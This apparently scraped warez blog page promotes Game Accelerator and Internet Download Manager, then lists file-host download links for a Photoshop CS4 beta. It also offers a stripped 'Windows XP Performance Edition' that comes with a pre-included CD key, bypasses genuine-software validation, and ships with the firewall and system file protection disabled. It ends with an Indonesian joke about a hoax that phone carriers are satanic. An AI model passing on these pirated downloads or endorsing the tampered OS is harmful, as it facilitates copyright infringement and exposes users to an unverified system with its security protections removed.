Game Accelerator is an all-in-one game optimization tool that allows you to play your games at the best level of performance possible.
Game Accelerator is a highly-developed, intelligent program that will assess your PC’s hardware and operating environment and optimize it to provide a faster, more stable gaming experience.
To provide the gaming experience available, Game Accelerator is an all-in-one game optimization tool that allows you to run your games at the best possible performance by eliminating the performance and stability problems that make your games run slower than they should.
This is done through easy one-click menu options that allow you to tailor your games to run faster based on your system hardware.
The combination of optimization techniques used by Game Accelerator help significiantly improve your
gaming experience, turning your computer into the ultimate gaming machine.
Furthermore, to make your overall computer experience even smoother, an intelligent pop-up ad blocker is included to block those annoying spam pop-up and pop-under ads, as well as an easy-to-use system monitor taskbar that allows you to keep track of your computer's health.
Download Here
Internet Download Manager 5.12 Build 11
Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download accelerators and managers that segment files before downloading starts, Internet Download Manager segments downloaded files dynamically during download process. Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.
Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), built-in download accelerator, and many others.
Main Features:
• All popular browsers and applications are supported! Internet Download Manager has been tested with the following browsers: Internet Explorer, MSN Explorer, AOL, Netscape Communicator, Netscape 6, Netscape 7, Mozilla, Mozilla Firefox, Mozilla Firebird, Opera, NetCaptor, UltraBrowser, Slim Browser, Avant Browser, MyIE2, Optimal Desktop, Ace Explorer, Advanced Browser, 27 Tools-in-1 Wichio Browser, WindowSurfer, 550 Access Browser, FineBrowser Freeware, Kopassa Browser, Fast Browser Pro, Enigma Browser, GoSuRF, K-Meleon, Smart Explorer, The Off By One Web Browser, Smartalec Voyager, CrystalPort AppCapture, The Family Browser, XANA Web Browser, Bluto, AutoSurf, 32bit Web Browser, BrowseMan, WrestlingBrowser, Eminem Browser, UltraBrowser, Cygsoft LDAP Browser, and Net M@nager. Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.
• Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.
• Download Speed Acceleration. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
• Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.
• YouTube grabber. Internet Download Manager can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.
• Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager
• Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.
• Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
• Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.
• Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.
• IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It's possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.
• IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
• IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
• Download All feature. IDM can add all downloads linked to the current page. It's easy to download multiple files with this feature.
• Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.
• Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.
• Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.
• Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
• IDM is multilingual. IDM is translated to Albanian, Arabic, Azerbaijan, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, Farsi, French, German, Greek, Hebrew, Hungarian, Italian, Japanese, Korean, Lithuanian, Macedonian, Norwegian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Thai, Turkish, and Uzbek languages.
What's new in version 5.12 Build 11 (May 12, 2008):
* Fixed a bug with several https servers
* Improved file name creation logic to save on a disk and to display on "Download progress" dialog
* Version 5.12 build 11 includes all latest bug fixes
Download Here
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.
Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), built-in download accelerator, and many others.
Main Features:
• All popular browsers and applications are supported! Internet Download Manager has been tested with the following browsers: Internet Explorer, MSN Explorer, AOL, Netscape Communicator, Netscape 6, Netscape 7, Mozilla, Mozilla Firefox, Mozilla Firebird, Opera, NetCaptor, UltraBrowser, Slim Browser, Avant Browser, MyIE2, Optimal Desktop, Ace Explorer, Advanced Browser, 27 Tools-in-1 Wichio Browser, WindowSurfer, 550 Access Browser, FineBrowser Freeware, Kopassa Browser, Fast Browser Pro, Enigma Browser, GoSuRF, K-Meleon, Smart Explorer, The Off By One Web Browser, Smartalec Voyager, CrystalPort AppCapture, The Family Browser, XANA Web Browser, Bluto, AutoSurf, 32bit Web Browser, BrowseMan, WrestlingBrowser, Eminem Browser, UltraBrowser, Cygsoft LDAP Browser, and Net M@nager. Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.
• Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.
• Download Speed Acceleration. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
• Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.
• YouTube grabber. Internet Download Manager can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.
• Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager
• Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.
• Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
• Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.
• Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.
• IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It's possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.
• IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
• IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
• Download All feature. IDM can add all downloads linked to the current page. It's easy to download multiple files with this feature.
• Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.
• Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.
• Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.
• Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
• IDM is multilingual. IDM is translated to Albanian, Arabic, Azerbaijan, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, Farsi, French, German, Greek, Hebrew, Hungarian, Italian, Japanese, Korean, Lithuanian, Macedonian, Norwegian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Thai, Turkish, and Uzbek languages.
What's new in version 5.12 Build 11 (May 12, 2008):
* Fixed a bug with several https servers
* Improved file name creation logic to save on a disk and to display on "Download progress" dialog
* Version 5.12 build 11 includes all latest bug fixes
Download Here
Adobe Photoshop CS4 v11.0 BETA Codename "StoneHenge"

Downloads :
[RS]Download :
http://rapidshare.com/files/100946228/Adobe_Photoshop_CS4_Beta.part01.rar
http://rapidshare.com/files/100946390/Adobe_Photoshop_CS4_Beta.part02.rar
http://rapidshare.com/files/100946548/Adobe_Photoshop_CS4_Beta.part03.rar
http://rapidshare.com/files/100946783/Adobe_Photoshop_CS4_Beta.part04.rar
http://rapidshare.com/files/100946946/Adobe_Photoshop_CS4_Beta.part05.rar
http://rapidshare.com/files/100947198/Adobe_Photoshop_CS4_Beta.part06.rar
http://rapidshare.com/files/100947425/Adobe_Photoshop_CS4_Beta.part07.rar
http://rapidshare.com/files/100947669/Adobe_Photoshop_CS4_Beta.part08.rar
http://rapidshare.com/files/100947901/Adobe_Photoshop_CS4_Beta.part09.rar
[DepositFile]Download :
http://depositfiles.com/files/3492033
http://depositfiles.com/files/3492076
http://depositfiles.com/files/3492164
http://depositfiles.com/files/3492137
http://depositfiles.com/files/3492193
[FileFactory]Download :
http://www.filefactory.com/file/b5a5dc
http://www.filefactory.com/file/867a42
http://www.filefactory.com/file/2701bd
http://www.filefactory.com/file/02931b
http://www.filefactory.com/file/efbdc5
http://www.filefactory.com/file/82aee5
http://www.filefactory.com/file/989767
http://www.filefactory.com/file/1c3827
http://www.filefactory.com/file/1ca47b
MS WINDOWS XP SP3 PERFORMANCE EDITION


Windows XP Performance Edition SP3 - April 2008
Original Size: 595 mb
New Size: 196 mb (Difference of 399 mb)
(This is the Size of the ISO)
This is a FULL Install. You CANNOT Upgrade from previous versions of Windows.
There is no validation required. This PASSES WGA.
I have included the CD-Key already in the install process. This means at no point will you have to enter it.
This has all windows updates through April 2008. This is has been tested in VMWare Numerous times with no errors.
This works 100% with Windows Update.
Firefox 2.0.1.4 Has been included because its much more secure and efficient than IE.
This is the English Only Edition.
The Following has been Removed From This OS.
Applications:
Briefcase
Games
Internet Games
Pinball
Screensavers
Drivers:
Asynchronous Transfer Mode (ATM)
Display Adapters
Display Adapters (old)
IBM PS/2 TrackPoint
IBM Thinkpad
ISDN
Logitech WingMan
Microsoft SideWinder
Modems
MultiFunctional
Portable Audio
Printers
Scanners
Serial Pen Tablet
Sony Jog Dial
Tape drives
Toshiba DVD decoder card
HardWare Support:
Brother Devices
Gravis Digital GamePort
Iomega Zip drive
Multi-port serial adapters
Ramdisk
Multimedia:
ActiveX for streaming video
AOL ART Image Format Support
Media Center
Mouse Cursors
Movie Maker
Music Samples
Old CDPlayer and Sound Recorder
Speech Support
Tablet PC
Windows Sounds
Networking:
Client for Netware Networks
Communication tools
Comtrol Test Terminal Program
Connection Manager
FrontPage Extensions
H323 MSP
Internet Connection Wizard
Internet Information Services (IIS)
IP Conferencing
MSN Explorer
Netmeeting
Peer-to-Peer
Share Creation Wizard
Synchronization Manager
Vector Graphics Rendering (VML)
Web Folders
Windows Messenger
Operating System Options:
.NET Framework
Administrative Templates
Administrator VB scripts
Blaster/Nachi removal tool
Color Schemes
Desktop Cleanup Wizard
Document Templates
DR Watson
FAT to NTFS converter
File and Settings Wizard
Help and Support
Input Method Editor
Manual Install and Upgrade
MS XML 2.0
Search Assistant
Security Center
Service Pack Messages
Shell Media Handler
Symbolic Debugger (NTSD)
Tour
Web View
Zip Folders
Services:
Alerter
Application Layer Gateway
Beep Driver
Distributed Link Tracking Client
Error Reporting
Fax Service
IMAPI CD-Burning COM Service
Indexing Service
Messenger
Network DDE
Remote Registry
Removable Storage
Route Listening Service
RPC Locator
Service Advertising Protocol
TCP/IP NetBIOS Helper
Uninterruptible Power Supply
Volume Shadow Copy
Directories:
DOCS
SUPPORT
VALUEADD
I have disabled and deleted the Classic Windows XP Install Screens with the info about XP and the blue Background.
You will just see a black background now and the install will look similar to 2000. This saves Space and gives more
info while installing.
The Minimum HD and RAM Requirements have been lifted. You can try and install this on whatever machine you like now.
High ISO Compression has been enabled to save space.
The Following Tweaks and Patches Have been Applied.
Patches:
TCP/IP Half-Open Connections = 100 (Default 10)
UXTheme Patch (Allows Unsigned Themes to be applied to XP)
Windows System File Checker Disabled (SFC)
Registry Tweaks:
Boot and Shutdown-Status Messages-Extended
Desktop-My Computer icon-Show
Desktop-My Documents icon-Show
Desktop-My Network Places icon-Hide
Desktop-Recycle Bin icon-Show
Explorer-Disable Prefix: Shortcut to
Explorer-Disable shortcut arrow
Explorer-Show extensions of known file-types
Explorer-Show hidden files and folders
Explorer-Show protected operating system files
Internet Explorer-Disable information bar when popup is blocked
Internet Explorer-Disable Outlook Express link creation
Internet Explorer-Disable sound when popup is blocked
Internet Explorer-Keep IE URL-History for-0 Days
Internet Explorer-Set Homepage-www.google.com
Internet Explorer-Set Internet Explorer to accept 10 connects at a time
My Computer-Add Administrative Tools
My Computer-Add Control Panel
My Computer-Add My Network Places
My Computer-Add Network Connections
Performance-Disable Info Tips on Files and Folders
Performance-Disable Last accessed Timestamp on files
Performance-Disable Optimize harddisk when idle
Performance-Disable Tracking of Broken Shortcut Links
Privacy-Disable Driver Update Internet prompt
Privacy-Remove Alexa
Security-Always show Updates under Software
Start Menu-Clear most recently opened documents list on logoff
Start Menu-Disable Highlight newly installed programs
Start Menu-Disable popup on first boot
Start Menu-Do not use Personalized Menus
Start Menu-My Network Places-Don't display this item
Start Menu-Network Connections-Link to Network Connections folder
Start Menu-Printers and Faxes-Don't display this item
Start Menu-Remove Search For People from Search
Start Menu-Remove Search the Internet from Search
Start Menu-Remove Set Program Access and Defaults
Start Menu-Remove Windows Catalog shortcut
Taskbar-Disable Balloon Tips
Taskbar-Disable Language-Bar
Taskbar-Hide Volume Control Icon in System Tray
Taskbar-Lock the Taskbar-Yes
Visual Effects-Animate windows when minimizing and maximizing-Disable
Visual Effects-Tooltip animation-Disable
Windows Media Player-Accept Privacy Statement
Windows Media Player-Disable auto-add music to library
Windows Media Player-Disable automatic codec download
Windows Media Player-Disable metadata retrieval
Windows Media Player-Disable MRU
Windows Media Player-Disable silent acqusition
Windows Media Player-Disable starting with Media Guide
Windows Media Player-Enhanced privacy settings
The Following Settings Have been added to the unattended aspect of this OS.
VLK Serial Number
Firewall Disabled
System Restore Service Disabled
Automatic Updates Disabled (Can be re-enabled)
Default Theme Set on Classic (Can Change to Luna Which is Still Included)
Install Notes:
1. Unrar the ISO from the archives using Winrar.
2. Burn the ISO using a program such as Nero, Alcohol 120, Blindwrite, ect... (Burn at a slow Speed to ensure no errors, 2x-4x)
3. Change Bios Priority settings so it boots from the CD-ROM Drive First. (You may be able to skip this step)
4. Insert Disc and Reboot PC, Follow the on screen prompts and enjoy.
Notes:
If you are getting errors while copying files. It's your CD, not the release. Try burning it to different brand of cd/media and try burning at the slowest speed possible.
I just tested this in VMWare and it works flawless. You should get between 17-19 Processes and under 100mb of ram usage when using the computer initially. Everything you install/use will obviously increase this, however its the leanest XP Copy around.
Download :
Part 1
Part 2
HOAX BARU NIH !!!.....
pro XL adalah kartu setan, lambang X berarti lambang salib yang dipatahkan. L = Lucifer, pemimpin gereja setan tertinggi. jadi PRO-XL adalah PRO-SATAN = ANTIKRIS!, HANCURKAN KARTU2 ITU, siram dengan air suci!!! ikanasinz: "INDOSAT adalah provider SETAN, INDO-SAT, SAT diambil dari "SATAN", jika hp anda muncul provider id SAT-C maka artinya adalah SATAN SEE atau SETAN MELIHAT.. HANCURKAN KARTU2 ITU, BERITAHU TEMAN2 ANDA Kalo pake three juga setan !!! alasannya kenapa ? petrus menyangkal Tuhan 3 kali.. 3 = THREE kalo GSM= Gabungan Setan Mejeng kalo CDMA apa ya?? Cetan Di Mana Aja kali yee jadi intinye jangan pake kartu apa2,setan smua.
mari kita pake telpon umum,cuma perlu koin.ato ga make telpon kaleng yang disambung benang.asik tuh
cape deh
mari kita pake telpon umum,cuma perlu koin.ato ga make telpon kaleng yang disambung benang.asik tuh
cape deh
Subscribe to:
Comments (Atom)










